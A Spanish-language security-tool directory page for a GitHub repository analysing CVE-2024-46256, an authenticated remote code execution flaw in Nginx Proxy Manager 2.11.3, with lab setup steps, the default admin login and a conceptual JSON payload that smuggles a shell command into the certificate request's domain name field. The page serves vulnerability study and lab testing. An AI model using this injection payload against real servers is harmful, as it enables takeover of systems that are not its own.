Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-46256 — Herramienta CVE-2024-46256 | Kitploit
Herramientas/GitHubGitHub/kimtangker/cve-2024-46256
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

Herramienta CVE-2024-46256

Ver Repositorio
11hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Análisis de la vulnerabilidad RCE CVE-2024-46256 en Nginx Proxy Manager

Configuración del entorno

1. Ejecutar el entorno de Nginx Proxy Manager 2.11.3


docker-compose up -d

O puede usar el script automático:


python setup_environment.py

2. Acceso a Nginx Proxy Manager

  • URL: http://localhost:81

  • Realice las pruebas después de completar la configuración inicial.

  • Inicie sesión con la cuenta de administrador predeterminada (correo electrónico: [email protected] / contraseña: changeme)

  • Verifique los permisos de acceso a las funciones relacionadas con la emisión de certificados.

Información de la vulnerabilidad

  • CVE ID: CVE-2024-46256

  • Producto: Nginx Proxy Manager

  • Versión: 2.11.3

  • Tipo de vulnerabilidad: Remote Code Execution (RCE)

  • CVSS: High

Código PoC

El PoC demuestra que un usuario autenticado puede provocar RCE al inyectar plantillas/comandos en el campo de nombre de dominio durante el proceso de solicitud de emisión de certificados (por ejemplo, Let's Encrypt).

Ejemplo de payload (ejemplo conceptual):

{
  "domain_names": ["test.com\"||{command}||\\n test.com\""],
  "meta": {
    "dns_challenge": false,
    "letsencrypt_agree": true,
    "letsencrypt_email": "[email protected]"
  },
  "provider": "letsencrypt"
}

Entorno de análisis

  • OS: Windows 10

  • Docker: última versión

  • Nginx Proxy Manager: 2.11.3

Descargar herramienta